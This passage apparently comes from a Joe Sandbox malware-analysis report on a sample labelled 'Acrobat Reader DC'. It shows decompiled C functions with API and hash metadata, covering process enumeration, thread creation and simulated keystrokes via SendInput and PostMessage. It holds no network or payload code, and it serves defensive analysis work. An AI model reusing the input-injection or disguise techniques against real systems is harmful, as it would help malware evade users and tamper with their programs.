                                  				_push(_t57);
                                  				_push(_t52);
                                  				_t53 = _t15;
                                  				_t35 = _t53 + 0x44;
                                  				E0040F9D0(_t35,  &_v16, 8);
                                  				_t42 =  *_t35 >> 0x00000003 & 0x0000003f;
                                  				if(( *_t35 >> 0x00000003 & 0x0000003f) >= 0x38) {
                                  					_t18 = 0x78;
                                  				} else {
                                  					_t18 = 0x38;
                                  				}
                                  				E0040F880(_t18 - _t42, _t42, _t53, 0x4921a8);
                                  				E0040F880(8, _t42, _t53,  &_v16);
                                  				E0040F9D0(_t53 + 0x34, _t53, 0x10);
                                  				E00412F40(_t35, 0, 8);
                                  				E00412F40(_t53 + 0x34, 0, 0x10);
                                  				E00412F40(_t53 + 0x4c, 0, 0x40);
                                  				_t36 = _t53 + 0x10;
                                  				_t67 = _t66 + 0x24;
                                  				 *((char*)(_t53 + 0x10)) = 0;
                                  				_t59 = 0;
                                  				do {
                                  					E00414DB8( *(_t59 + _t53) & 0x000000ff,  &_v8, "%02X",  *(_t59 + _t53) & 0x000000ff);
                                  					_t31 = E00413660(_t36,  &_v8);
                                  					_t59 = _t59 + 1;
                                  					_t67 = _t67 + 0x14;
                                  				} while (_t59 < 0x10);
                                  				return _t31;
                                  			}

                                  APIs
                                  • _strlen.LIBCMT ref: 0040F858
                                    • Part of subcall function 0040F820: _memset.LIBCMT ref: 0040F828
                                    • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                    • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                  • _memset.LIBCMT ref: 0040F973
                                  • _memset.LIBCMT ref: 0040F97D
                                  • _memset.LIBCMT ref: 0040F98A
                                  • _sprintf.LIBCMT ref: 0040F9AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: _memset$_memmove$_sprintf_strlen
                                  • String ID: %02X
                                  • API String ID: 1823384282-436463671
                                  • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                  • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                  • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                  • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 95%
                                  			E00433EE0(void* __eflags, intOrPtr _a4, intOrPtr* _a8, char* _a12) {
                                  				char _v12;
                                  				char _v532;
                                  				intOrPtr _v560;
                                  				void* _v568;
                                  				char _v1084;
                                  				char _v1600;
                                  				char _v2116;
                                  				void* __edi;
                                  				void* _t22;
                                  				void* _t31;
                                  				intOrPtr _t32;
                                  				void* _t34;
                                  				void* _t45;
                                  				char* _t46;
                                  				void* _t47;
                                  				void* _t48;
                                  
                                  				_t46 = _a12;
                                  				_v568 = 0x22c;
                                  				_t45 = CreateToolhelp32Snapshot(2, 0);
                                  				_push( &_v568);
                                  				Process32FirstW(_t45);
                                  				 *_t46 = 0;
                                  				_t22 = E00433D5F(_a4, _a4);
                                  				_t48 = _t47 + 4;
                                  				_t34 = _t22;
                                  				if( *_t46 == 0) {
                                  					while(Process32NextW(_t45,  &_v568) == 1) {
                                  						E00413A0E( &_v532,  &_v12,  &_v2116,  &_v1084,  &_v1600);
                                  						E00411536( &_v1084,  &_v1600);
                                  						_t31 = E004114AB(_t45,  &_v1084, _a4);
                                  						_t48 = _t48 + 0x24;
                                  						if(_t31 != 0) {
                                  							if(_t34 != 0) {
                                  								_t32 = _v560;
                                  								if(_t34 == _t32) {
                                  									 *_a8 = _t32;
                                  									goto L8;
                                  								}
                                  							}
                                  						} else {
                                  							 *_a8 = _v560;
                                  							L8:
                                  							 *_t46 = 1;
                                  						}
                                  						if( *_t46 == 0) {
                                  							continue;
                                  						}
                                  						goto L10;
                                  					}
                                  				}
                                  				L10:
                                  				CloseHandle(_t45);
                                  				return 1;
                                  			}

                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00433EFD
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00433F0D
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00433F38
                                  • __wsplitpath.LIBCMT ref: 00433F63
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • _wcscat.LIBCMT ref: 00433F76
                                  • __wcsicoll.LIBCMT ref: 00433F86
                                  • CloseHandle.KERNEL32(00000000), ref: 00433FBF
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                  • String ID:
                                  • API String ID: 2547909840-0
                                  • Opcode ID: 182a9fd14032e8e93bb148eed081eedfbc5356b8f5808f875ed41f9760706005
                                  • Instruction ID: e17d583989bb1df9e9dd6b28cd90faaf4a95b78209a4298828de810110d6b8cb
                                  • Opcode Fuzzy Hash: 182a9fd14032e8e93bb148eed081eedfbc5356b8f5808f875ed41f9760706005
                                  • Instruction Fuzzy Hash: 9621EAB2800109ABC721DF50DC84FEEB7B8AB48300F5045DEF60997240EB799B84CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E0041F6F9(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
                                  				void* _t6;
                                  				long _t7;
                                  				intOrPtr* _t8;
                                  				intOrPtr* _t12;
                                  				long _t27;
                                  				long _t30;
                                  
                                  				if(_a4 != 0) {
                                  					_push(__esi);
                                  					_t30 = _a8;
                                  					__eflags = _t30;
                                  					if(_t30 != 0) {
                                  						_push(__edi);
                                  						while(1) {
                                  							__eflags = _t30 - 0xffffffe0;
                                  							if(_t30 > 0xffffffe0) {
                                  								break;
                                  							}
                                  							__eflags = _t30;
                                  							if(_t30 == 0) {
                                  								_t30 = _t30 + 1;
                                  								__eflags = _t30;
                                  							}
                                  							_t6 = HeapReAlloc( *0x496e6c, 0, _a4, _t30);
                                  							_t27 = _t6;
                                  							__eflags = _t27;
                                  							if(_t27 != 0) {
                                  								L17:
                                  								_t7 = _t27;
                                  							} else {
                                  								__eflags =  *0x496e68 - _t6;
                                  								if(__eflags == 0) {
                                  									_t8 = E00417F77(__eflags);
                                  									 *_t8 = E00417F35(GetLastError());
                                  									goto L17;
                                  								} else {
                                  									__eflags = E00411988(_t30);
                                  									if(__eflags == 0) {
                                  										_t12 = E00417F77(__eflags);
                                  										 *_t12 = E00417F35(GetLastError());
                                  										L12:
                                  										_t7 = 0;
                                  										__eflags = 0;
                                  									} else {
                                  										continue;
                                  									}
                                  								}
                                  							}
                                  							goto L14;
                                  						}
                                  						E00411988(_t30);
                                  						 *((intOrPtr*)(E00417F77(__eflags))) = 0xc;
                                  						goto L12;
                                  					} else {
                                  						E00413748(_a4);
                                  						_t7 = 0;
                                  					}
                                  					L14:
                                  					return _t7;
                                  				} else {
                                  					return E004135BB(__edx, __edi, __esi, _a8);
                                  				}
                                  			}

                                  APIs
                                  • _malloc.LIBCMT ref: 0041F707
                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                  • _free.LIBCMT ref: 0041F71A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: AllocateHeap_free_malloc
                                  • String ID: [B
                                  • API String ID: 1020059152-632041663
                                  • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                  • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                  • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                  • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00436C6E(void** _a4, intOrPtr* _a8, void** _a12) {
                                  				void* _t7;
                                  				void* _t11;
                                  				void* _t23;
                                  
                                  				_t23 = E00436B19();
                                  				_t7 = GetCurrentProcess();
                                  				DuplicateHandle(GetCurrentProcess(),  *_a4, _t7, _t23, 0, 0, 2);
                                  				_t2 = _t23 + 8; // 0x8
                                  				_t11 = GetCurrentProcess();
                                  				DuplicateHandle(GetCurrentProcess(),  *_a12, _t11, _t2, 0, 0, 2);
                                  				 *((intOrPtr*)(_t23 + 4)) =  *_a8;
                                  				return CreateThread(0, 0, E00436C2B, _t23, 0, 0);
                                  			}

                                  APIs
                                    • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                    • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                  • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                  • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                  • CreateThread.KERNEL32 ref: 00436CCA
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                  • String ID:
                                  • API String ID: 1957940570-0
                                  • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                  • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                  • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                  • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E0043028B(signed int _a4, int _a8, signed int _a12) {
                                  				signed int _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				struct tagRECT _v40;
                                  				struct tagRECT _v56;
                                  				signed int _t161;
                                  				int _t182;
                                  				signed int _t217;
                                  				signed int _t218;
                                  				signed int _t219;
                                  				signed int _t221;
                                  				struct HWND__* _t223;
                                  				long _t225;
                                  				struct HWND__* _t226;
                                  				signed int _t228;
                                  				signed int _t243;
                                  				struct HWND__* _t244;
                                  				signed int _t251;
                                  				struct HWND__* _t252;
                                  				struct HWND__* _t256;
                                  				struct HWND__** _t265;
                                  				struct HWND__* _t266;
                                  				struct HWND__** _t275;
                                  
                                  				_t275 = _a8;
                                  				_t265 = _a4;
                                  				if(_t265[0xe] == 0) {
                                  					_a8 = _t275[0x1f] & 0x0000ffff;
                                  					GetClientRect( *_t265,  &_v56);
                                  					_t161 = _v56.right;
                                  					_t243 = _v56.bottom;
                                  					_t223 = _t265[0x11];
                                  					_t218 = _t265[0x12];
                                  					_a12 = _t161;
                                  					_v24 = _t243;
                                  					_a4 = _t223;
                                  					_v12 = _t218;
                                  					if(_t161 == 0) {
                                  						_a12 = 1;
                                  						if(_t223 != 0) {
                                  							_a12 = _t223;
                                  						}
                                  					}
                                  					if(_t243 == 0) {
                                  						_v24 = 1;
                                  						if(_t218 != 0) {
                                  							_v24 = _t218;
                                  						}
                                  					}
                                  					if(_t265[0x68] != 0) {
                                  						_t218 = _t218 - GetSystemMetrics(0xf);
                                  						_v12 = _t218;
                                  					}
                                  					GetWindowRect( *_t275,  &_v56);
                                  					_t225 = _v56.left;
                                  					_t244 = _v56.top;
                                  					_v16 = _v56.right - _t225;
                                  					_v40.bottom = _t244;
                                  					_v20 = _v56.bottom - _t244;
                                  					_v40.right.x = _t225;
                                  					ScreenToClient( *_t265,  &(_v40.right));
                                  					_t226 = _v40.right.x;
                                  					asm("cdq");
                                  					_t266 = _v40.bottom;
                                  					_t275[0x20] = _t226 * _a4 / _a12;
                                  					asm("cdq");
                                  					_t219 = _v24;
                                  					_t275[0x20] = _t266 * _t218 / _v24;
                                  					asm("cdq");
                                  					_t275[0x21] = _v16 * _a4 / _a12;
                                  					asm("cdq");
                                  					_t275[0x21] = _v20 * _v12 / _t219;
                                  					_t182 = _a8;
                                  					if(_t182 == 0) {
                                  						goto L48;
                                  					} else {
                                  						if((_t182 & 0x00000100) != 0) {
                                  							_t256 = _v16;
                                  							_t275[0x21] = _t256;
                                  							if((_t182 & 0x00000006) == 0) {
                                  								if((_t182 & 0x00000008) == 0) {
                                  									asm("cdq");
                                  									if(_t226 > _a12 - _t256 >> 1) {
                                  										_t220 = _a12;
                                  										asm("cdq");
                                  										_t219 = _v24;
                                  										_t275[0x20] = (_t226 - _a12 + _v16) * _a4 / _t220 - _v16 + _a4;
                                  									}
                                  								} else {
                                  									asm("cdq");
                                  									_t275[0x20] = _t226 - (_a4 - _a12 - _t256 >> 1);
                                  								}
                                  								_t182 = _a8;
                                  							}
                                  						}
                                  						if((_t182 & 0x00000200) != 0) {
                                  							_t252 = _v20;
                                  							_t275[0x21] = _t252;
                                  							if((_t182 & 0x00000060) == 0) {
                                  								if(_t182 >= 0) {
                                  									asm("cdq");
                                  									if(_t266 > _t219 - _t252 >> 1) {
                                  										asm("cdq");
                                  										_t275[0x20] = (_t266 - _t219 + _v20) * _v12 / _t219 - _v20 + _v12;
                                  									}
                                  								} else {
                                  									asm("cdq");
                                  									_t275[0x20] = _t266 - (_v12 - _t219 - _t252 >> 1);
                                  								}
                                  								_t182 = _a8;
                                  							}
                                  						}
                                  						_t251 = _t182 & 0x00000002;
                                  						if(_t251 != 0) {
                                  							_t275[0x20] = _t226;
                                  						}
                                  						if((_t182 & 0x00000004) != 0) {
                                  							if(_t251 == 0) {
                                  								_t275[0x20] = _t226 - _a12 - _t275[0x21] + _a4 + _v16;
                                  							} else {
                                  								_t275[0x21] = _t226 - _t275[0x20] - _a12 + _a4 + _v16;
                                  							}
                                  						}
                                  						_t228 = _t182 & 0x00000020;
                                  						if(_t228 != 0) {
                                  							_t275[0x20] = _t266;
                                  						}
                                  						if((_t182 & 0x00000040) == 0) {
                                  							goto L48;
                                  						} else {
                                  							if(_t228 == 0) {
                                  								_t275[0x20] = _t266 - _t275[0x21] - _t219 + _v12 + _v20;
                                  								return _t182;
                                  							}
                                  							_t275[0x21] = _t266 - _t275[0x20] - _t219 + _v12 + _v20;
                                  							return _t182;
                                  						}
                                  					}
                                  				} else {
                                  					_t275[0x20] = _t265[0x16];
                                  					_t275[0x20] = _t265[0x17];
                                  					if(_t275[0x22] != 7 || _a12 != 0) {
                                  						_t275[0x21] = _t265[0x18];
                                  						_t275[0x21] = _t265[0x19];
                                  					}
                                  					GetClientRect( *_t275,  &_v40);
                                  					_t221 = _t217 | 0xffffffff;
                                  					if(_t265[0x16] == _t221) {
                                  						_t275[0x20] = _v40.left;
                                  					}
                                  					if(_t265[0x17] == _t221) {
                                  						_t275[0x20] = _v40.top;
                                  					}
                                  					_t182 = GetWindowRect( *_t275,  &_v40);
                                  					if(_t265[0x18] == _t221) {
                                  						_t275[0x21] = _v40.right.x - _v40.left;
                                  					}
                                  					if(_t265[0x19] == _t221 || _t275[0x22] == 0) {
                                  						_t275[0x21] = _v40.bottom - _v40.top;
                                  						return _t182;
                                  					} else {
                                  						L48:
                                  						return _t182;
                                  					}
                                  				}
                                  			}




























                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Rect$Client$Window$MetricsScreenSystem
                                  • String ID:
                                  • API String ID: 3220332590-0
                                  • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                  • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                  • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                  • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00444BFC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a15) {
                                  				char _v12;
                                  				void* __edi;
                                  				signed int _t47;
                                  				signed int _t49;
                                  				signed int _t50;
                                  				signed int _t62;
                                  				signed int _t64;
                                  				signed int _t69;
                                  				signed int _t76;
                                  				signed int _t77;
                                  				signed int _t79;
                                  				signed int _t80;
                                  				signed int _t81;
                                  				signed int _t82;
                                  				signed int _t83;
                                  				intOrPtr _t85;
                                  				signed int _t88;
                                  				intOrPtr _t90;
                                  				intOrPtr _t93;
                                  				intOrPtr _t94;
                                  				void* _t96;
                                  				void* _t97;
                                  				void* _t98;
                                  				void* _t99;
                                  
                                  				_t94 = _a8;
                                  				_t93 = _a12;
                                  				_t47 = 0;
                                  				while(1) {
                                  					_t80 =  *(_t94 + _t47 * 2) & 0x0000ffff;
                                  					if(_t80 != 0x20 && _t80 != 9) {
                                  						break;
                                  					}
                                  					_t47 = _t47 + 1;
                                  				}
                                  				_t81 =  *(_t94 + _t47 * 2) & 0x0000ffff;
                                  				__eflags = _t81 - 0x22;
                                  				if(_t81 != 0x22) {
                                  					__eflags = _t81 - 0x27;
                                  					if(_t81 != 0x27) {
                                  						__eflags = _t81 - 0x3c;
                                  						if(_t81 != 0x3c) {
                                  							goto L29;
                                  						} else {
                                  							_t9 = _t81 + 2; // 0x2
                                  							_t88 = _t9;
                                  							_a15 = 0;
                                  							goto L10;
                                  						}
                                  					} else {
                                  						_t88 = _t81;
                                  						_a15 = 1;
                                  						goto L10;
                                  					}
                                  				} else {
                                  					_t88 = _t81;
                                  					_a15 = 1;
                                  					L10:
                                  					_t82 =  *(_t94 + 2 + _t47 * 2) & 0x0000ffff;
                                  					_t49 = _t47 + 1;
                                  					_t76 = 0;
                                  					__eflags = _t82 - _t88;
                                  					if(_t82 != _t88) {
                                  						while(1) {
                                  							__eflags = _t82;
                                  							if(_t82 == 0) {
                                  								goto L13;
                                  							}
                                  							_t49 = _t49 + 1;
                                  							 *(_t93 + _t76 * 2) = _t82;
                                  							_t82 =  *(_t94 + _t49 * 2) & 0x0000ffff;
                                  							_t76 = _t76 + 1;
                                  							__eflags = _t82 - _t88;
                                  							if(_t82 != _t88) {
                                  								continue;
                                  							}
                                  							goto L13;
                                  						}
                                  					}
                                  					L13:
                                  					__eflags =  *(_t94 + _t49 * 2) - _t88;
                                  					if( *(_t94 + _t49 * 2) != _t88) {
                                  						L29:
                                  						__eflags = 0;
                                  						return 0;
                                  					} else {
                                  						goto L14;
                                  						do {
                                  							do {
                                  								L14:
                                  								_t83 =  *(_t94 + 2 + _t49 * 2) & 0x0000ffff;
                                  								_t49 = _t49 + 1;
                                  								__eflags = _t83 - 0x20;
                                  							} while (_t83 == 0x20);
                                  							__eflags = _t83 - 9;
                                  						} while (_t83 == 9);
                                  						_t50 =  *(_t94 + _t49 * 2) & 0x0000ffff;
                                  						__eflags = _t50;
                                  						if(__eflags == 0) {
                                  							L18:
                                  							 *(_t93 + _t76 * 2) = 0;
                                  							E0043652F(__eflags,  &_v12, E00410160(_t93, __eflags));
                                  							_t95 = _v12;
                                  							E00444B5F( &_v12, _v12);
                                  							E00444BBB( &_v12, __eflags, _v12);
                                  							__eflags = _a15;
                                  							if(_a15 == 0) {
                                  								_t85 = _a4;
                                  								_t77 = 0;
                                  								__eflags =  *(_t85 + 0x3c);
                                  								if( *(_t85 + 0x3c) > 0) {
                                  									while(1) {
                                  										E00411567(_t93,  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x38)) + _t77 * 4)));
                                  										E00411536(_t93, _t95);
                                  										_t62 = E004339FA(_t93);
                                  										_t97 = _t96 + 0x14;
                                  										__eflags = _t62;
                                  										if(_t62 != 0) {
                                  											goto L28;
                                  										}
                                  										E00411567(_t93, _t95);
                                  										_t90 = _a4;
                                  										_t77 = _t77 + 1;
                                  										_t96 = _t97 + 8;
                                  										__eflags = _t77 -  *((intOrPtr*)(_t90 + 0x3c));
                                  										if(_t77 <  *((intOrPtr*)(_t90 + 0x3c))) {
                                  											continue;
                                  										}
                                  										goto L28;
                                  									}
                                  								}
                                  								goto L28;
                                  							} else {
                                  								_t64 = E004339FA(_t93);
                                  								_t98 = _t96 + 4;
                                  								__eflags = _t64;
                                  								if(_t64 == 0) {
                                  									_t79 =  *((intOrPtr*)(_a4 + 0x3c)) - 1;
                                  									__eflags = _t79;
                                  									if(_t79 < 0) {
                                  										L28:
                                  										E00436508( &_v12);
                                  										return 1;
                                  									} else {
                                  										while(1) {
                                  											E00411567(_t93,  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x38)) + _t79 * 4)));
                                  											E00411536(_t93, _t95);
                                  											_t69 = E004339FA(_t93);
                                  											_t99 = _t98 + 0x14;
                                  											__eflags = _t69;
                                  											if(_t69 != 0) {
                                  												goto L28;
                                  											}
                                  											E00411567(_t93, _t95);
                                  											_t98 = _t99 + 8;
                                  											_t79 = _t79 - 1;
                                  											__eflags = _t79;
                                  											if(_t79 >= 0) {
                                  												continue;
                                  											} else {
                                  												E00436508( &_v12);
                                  												return 1;
                                  											}
                                  											goto L30;
                                  										}
                                  										goto L28;
                                  									}
                                  								} else {
                                  									E00436508( &_v12);
                                  									return 1;
                                  								}
                                  							}
                                  						} else {
                                  							__eflags = _t50 - 0x3b;
                                  							if(__eflags != 0) {
                                  								goto L29;
                                  							} else {
                                  								goto L18;
                                  							}
                                  						}
                                  					}
                                  				}
                                  				L30:
                                  			}




























                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcscpy$_wcscat
                                  • String ID:
                                  • API String ID: 2037614760-0
                                  • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                  • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                  • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                  • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E0044C514(signed char _a4, signed int _a8) {
                                  				signed short _v8;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				short _v30;
                                  				short _v32;
                                  				long _v36;
                                  				char _v292;
                                  				signed int _t40;
                                  				signed char _t58;
                                  				signed char _t67;
                                  				signed char _t79;
                                  				struct HWND__* _t80;
                                  				long _t83;
                                  				void* _t85;
                                  
                                  				_t67 = _a4;
                                  				_t80 =  *(_t67 + 0x20);
                                  				_t79 = _a8;
                                  				_t40 =  *_t79;
                                  				_a8 = _t40;
                                  				_a4 =  *((intOrPtr*)(_t79 + 7));
                                  				_v8 =  *(_t79 + 8) & 0x0000ffff;
                                  				if(_t80 == 0 || _t40 == 0x14 || _t40 == 0x90 || _t40 == 0x91) {
                                  					if(E0043487C(_t79) == 0) {
                                  						_v30 = _v8;
                                  						_v36 = 1;
                                  						_v32 = 0;
                                  						_v28 = 4;
                                  						_v24 = 0;
                                  						_v20 = 0;
                                  						__imp__SendInput(1,  &_v36, 0x1c);
                                  						return E0043477C(_t67);
                                  					} else {
                                  						if(E00444980(_t79) != 1) {
                                  							E0043471D(_t67, _a8, _a4, 0);
                                  							return E0043477C(_t67);
                                  						} else {
                                  							E0043471D(_t67, _a8, _a4, 1);
                                  							return E0043477C(_t67);
                                  						}
                                  					}
                                  				} else {
                                  					if(E0043487C(_t79) == 0) {
                                  						PostMessageW(_t80, 0x102, _v8 & 0x0000ffff, 1);
                                  						return E0043477C(_t67);
                                  					} else {
                                  						if(GetKeyboardState( &_v292) != 0) {
                                  							 *(_t85 + (_a8 & 0x000000ff) - 0x120) =  *(_t85 + (_a8 & 0x000000ff) - 0x120) | 0x00000080;
                                  							SetKeyboardState( &_v292);
                                  						}
                                  						_t83 = (_a4 & 0x000000ff) << 0x00000010 | 0x00000001;
                                  						if(E00444980(_t79) == 1) {
                                  							_t83 = _t83 | 0x01000000;
                                  						}
                                  						if( *((char*)(_t67 + 0x17)) != 0 ||  *((char*)(_t67 + 0x1d)) != 0) {
                                  							_t58 = _a8;
                                  							goto L14;
                                  						} else {
                                  							_t58 = _a8;
                                  							if(_t58 == 0x12) {
                                  								L14:
                                  								if( *((char*)(_t67 + 0x16)) != 0 ||  *((char*)(_t67 + 0x1c)) != 0) {
                                  									goto L12;
                                  								} else {
                                  									PostMessageW( *(_t67 + 0x20), 0x104, _t58 & 0x000000ff, _t83 | 0x20000000);
                                  									return E0043477C(_t67);
                                  								}
                                  							} else {
                                  								L12:
                                  								PostMessageW( *(_t67 + 0x20), 0x100, _t58 & 0x000000ff, _t83);
                                  								return E0043477C(_t67);
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}



















                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 0044C570
                                  • SetKeyboardState.USER32(00000080), ref: 0044C594
                                  • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                  • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                  • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                  • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessagePost$KeyboardState$InputSend
                                  • String ID:
                                  • API String ID: 2221674350-0
                                  • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                  • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                  • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                  • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 63%
                                  			E00451B42(intOrPtr* _a4, signed short* _a8, signed short* _a12, char _a16, char _a20) {
                                  				signed short _v16;
                                  				char _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				char _v40;
                                  				char _v56;
                                  				char _v72;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t61;
                                  				long _t65;
                                  				intOrPtr _t70;
                                  				intOrPtr _t72;
                                  				intOrPtr _t86;
                                  				signed short* _t87;
                                  				intOrPtr* _t93;
                                  				intOrPtr _t99;
                                  				intOrPtr _t101;
                                  				signed int _t104;
                                  				intOrPtr _t107;
                                  				intOrPtr _t108;
                                  				intOrPtr* _t115;
                                  				signed short* _t116;
                                  				signed int _t120;
                                  
                                  				_t87 = _a8;
                                  				_t116 = _a12;
                                  				_v40 = 0;
                                  				_v32 = 1;
                                  				_v28 = 0;
                                  				_a12 = _t87;
                                  				if( *0x4a7f19 == 0) {
                                  					L14:
                                  					E00403C90( *((intOrPtr*)( *_a4 + 4)) + _a4, _t87, 0);
                                  					__eflags = _a20;
                                  					if(_a20 == 0) {
                                  						goto L13;
                                  					} else {
